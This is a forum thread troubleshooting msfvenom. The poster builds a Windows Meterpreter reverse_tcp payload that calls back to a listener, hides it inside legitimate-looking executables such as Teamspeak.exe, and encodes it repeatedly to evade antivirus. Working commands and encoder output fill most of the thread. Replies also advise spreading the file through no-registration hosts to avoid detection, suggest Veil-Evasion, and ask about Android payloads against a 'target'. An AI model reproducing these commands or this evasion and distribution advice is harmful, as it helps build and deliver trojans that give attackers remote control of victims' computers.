Forum Thread: Metasploit Framework MsfVenom Payload

Metasploit Framework MsfVenom Payload

I want to create a payload into the template.exe file and encrypt it with x86/shikataganai but when I run it it gives me the Error:

Error: Couldn't find DOS e_magic
I tried to google it, but I, as a Noob, didn't really find anything.
Here's everything:

msfvenom -p windows/meterpreter/reversetcp LHOST=10.0.0.18 LPORT=4444 -x /home/c17freak/Dokumente/C/Rechner/template.exe -e x86/shikataga_nai -f exe > template.exe

No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 100 iterations of x86/shikataganai
x86/shikataganai succeeded with size 360 (iteration=0)
x86/shikataganai succeeded with size 387 (iteration=1)
x86/shikataganai succeeded with size 414 (iteration=2)
x86/shikataganai succeeded with size 441 (iteration=3)
x86/shikataganai succeeded with size 468 (iteration=4)
x86/shikataganai succeeded with size 495 (iteration=5)
x86/shikataganai succeeded with size 522 (iteration=6)
x86/shikataganai succeeded with size 549 (iteration=7)
x86/shikataganai succeeded with size 576 (iteration=8)
x86/shikataganai succeeded with size 603 (iteration=9)
x86/shikataganai succeeded with size 630 (iteration=10)
x86/shikataganai succeeded with size 657 (iteration=11)
x86/shikataganai succeeded with size 684 (iteration=12)
x86/shikataganai succeeded with size 711 (iteration=13)
x86/shikataganai succeeded with size 738 (iteration=14)
x86/shikataganai succeeded with size 765 (iteration=15)
x86/shikataganai succeeded with size 792 (iteration=16)
x86/shikataganai succeeded with size 819 (iteration=17)
x86/shikataganai succeeded with size 846 (iteration=18)
x86/shikataganai succeeded with size 873 (iteration=19)
x86/shikataganai succeeded with size 900 (iteration=20)
x86/shikataganai succeeded with size 927 (iteration=21)
x86/shikataganai succeeded with size 954 (iteration=22)
x86/shikataganai succeeded with size 981 (iteration=23)
x86/shikataganai succeeded with size 1008 (iteration=24)
x86/shikataganai succeeded with size 1035 (iteration=25)
x86/shikataganai succeeded with size 1064 (iteration=26)
x86/shikataganai succeeded with size 1093 (iteration=27)
x86/shikataganai succeeded with size 1122 (iteration=28)
x86/shikataganai succeeded with size 1151 (iteration=29)
x86/shikataganai succeeded with size 1180 (iteration=30)
x86/shikataganai succeeded with size 1209 (iteration=31)
x86/shikataganai succeeded with size 1238 (iteration=32)
x86/shikataganai succeeded with size 1267 (iteration=33)
x86/shikataganai succeeded with size 1296 (iteration=34)
x86/shikataganai succeeded with size 1325 (iteration=35)
x86/shikataganai succeeded with size 1354 (iteration=36)
x86/shikataganai succeeded with size 1383 (iteration=37)
x86/shikataganai succeeded with size 1412 (iteration=38)
x86/shikataganai succeeded with size 1441 (iteration=39)
x86/shikataganai succeeded with size 1470 (iteration=40)
x86/shikataganai succeeded with size 1499 (iteration=41)
x86/shikataganai succeeded with size 1528 (iteration=42)
x86/shikataganai succeeded with size 1557 (iteration=43)
x86/shikataganai succeeded with size 1586 (iteration=44)
x86/shikataganai succeeded with size 1615 (iteration=45)
x86/shikataganai succeeded with size 1644 (iteration=46)
x86/shikataganai succeeded with size 1673 (iteration=47)
x86/shikataganai succeeded with size 1702 (iteration=48)
x86/shikataganai succeeded with size 1731 (iteration=49)
x86/shikataganai succeeded with size 1760 (iteration=50)
x86/shikataganai succeeded with size 1789 (iteration=51)
x86/shikataganai succeeded with size 1818 (iteration=52)
x86/shikataganai succeeded with size 1847 (iteration=53)
x86/shikataganai succeeded with size 1876 (iteration=54)
x86/shikataganai succeeded with size 1905 (iteration=55)
x86/shikataganai succeeded with size 1934 (iteration=56)
x86/shikataganai succeeded with size 1963 (iteration=57)
x86/shikataganai succeeded with size 1992 (iteration=58)
x86/shikataganai succeeded with size 2021 (iteration=59)
x86/shikataganai succeeded with size 2050 (iteration=60)
x86/shikataganai succeeded with size 2079 (iteration=61)
x86/shikataganai succeeded with size 2108 (iteration=62)
x86/shikataganai succeeded with size 2137 (iteration=63)
x86/shikataganai succeeded with size 2166 (iteration=64)
x86/shikataganai succeeded with size 2195 (iteration=65)
x86/shikataganai succeeded with size 2224 (iteration=66)
x86/shikataganai succeeded with size 2253 (iteration=67)
x86/shikataganai succeeded with size 2282 (iteration=68)
x86/shikataganai succeeded with size 2311 (iteration=69)
x86/shikataganai succeeded with size 2340 (iteration=70)
x86/shikataganai succeeded with size 2369 (iteration=71)
x86/shikataganai succeeded with size 2398 (iteration=72)
x86/shikataganai succeeded with size 2427 (iteration=73)
x86/shikataganai succeeded with size 2456 (iteration=74)
x86/shikataganai succeeded with size 2485 (iteration=75)
x86/shikataganai succeeded with size 2514 (iteration=76)
x86/shikataganai succeeded with size 2543 (iteration=77)
x86/shikataganai succeeded with size 2572 (iteration=78)
x86/shikataganai succeeded with size 2601 (iteration=79)
x86/shikataganai succeeded with size 2630 (iteration=80)
x86/shikataganai succeeded with size 2659 (iteration=81)
x86/shikataganai succeeded with size 2688 (iteration=82)
x86/shikataganai succeeded with size 2717 (iteration=83)
x86/shikataganai succeeded with size 2746 (iteration=84)
x86/shikataganai succeeded with size 2775 (iteration=85)
x86/shikataganai succeeded with size 2804 (iteration=86)
x86/shikataganai succeeded with size 2833 (iteration=87)
x86/shikataganai succeeded with size 2862 (iteration=88)
x86/shikataganai succeeded with size 2891 (iteration=89)
x86/shikataganai succeeded with size 2920 (iteration=90)
x86/shikataganai succeeded with size 2949 (iteration=91)
x86/shikataganai succeeded with size 2978 (iteration=92)
x86/shikataganai succeeded with size 3007 (iteration=93)
x86/shikataganai succeeded with size 3036 (iteration=94)
x86/shikataganai succeeded with size 3065 (iteration=95)
x86/shikataganai succeeded with size 3094 (iteration=96)
x86/shikataganai succeeded with size 3123 (iteration=97)
x86/shikataganai succeeded with size 3152 (iteration=98)
x86/shikataganai succeeded with size 3181 (iteration=99)
x86/shikataganai chosen with final size 3181
Payload size: 3181 bytes
Error: Couldn't find DOS e_magic

17 Responses

Try -o (Output Directory and filename) instead of > template.exe. That always gave me errors. Also as I remember the Meterpreter is reverse(underscore)tcp.

In your case it'll be,

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.18 LPORT=4444 -x /home/c17freak/Dokumente/C/Rechner/template.exe -e x86/shikataga_nai -f exe -o template.exe

Tried it:

msfvenom -p windows/meterpreter/reversetcp LHOST=inte adress LPORT=4444 -x /home/c17freak/Dokumente/C/Rechner/template.exe -e x86/shikatanai -i 30 -f exe -o template.exe

Error: undefined method `datastore' for nil:NilClass

Wait no, I wrote the encoder wrong.
Still the same Error:
Error: Couldn't find DOS e_magic

Have you tried without the encoding? If it works, check your encoding again. Not much familiar with encoding.

It works without -x. Does that help?

Nope, still won't work without encoding:
Error: Couldn't find DOS e_magic

Another problem is, always when I encode it and put it on a USB, I don't have access to it on the Windows PC.

Plus, when I upload it to mediafire it ALWAYS, obviously to how many iterations there are, it always detects it as a virus.

Are you using the MSF on Windows? Or in a Linux inside a VM? If you are using on Windows you will probably get tons of errors and crap. Extra plugins and support files may require.

And yeah, many famous File hosting sites and clouds will detect them whatever you do. Try the free, no-registration sites.

Nope, I'm on Backbox, installed on a HDD

Try these and tell me which steps passed and what failed. So we can isolate the problem.

  1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.18 LPORT=4444 -f exe -o template.exe
  2. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.18 LPORT=4444 -x /home/c17freak/Dokumente/C/Rechner/template.exe -f exe -o template.exe
  3. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.18 LPORT=4444 -e x86/shikataga_nai -f exe -o template.exe

Dont copy paste, you'll have to write.

Wait, no, the first and third worked, the second failed with the same ERROR.

All of it works, I already told you, the first code worked without the -x part.

Wait, no it was the cause of the C Program. I used a Teamspeak.exe and it worked ^^
Thank you!

Nope, still
Error: Couldn't find DOS e_magic
I write the templates in C and compile them with gcc:
gcc -std=c99 name.c -o name.exe
Is that the cause?

You can use veil evasion or any other encoder and see.

I need an answer to my question, "if you make a payload for Android phone, would you be on the same network connection with your target?" and the session died when it connect on the same network.

Share Your Thoughts

  • Hot
  • Active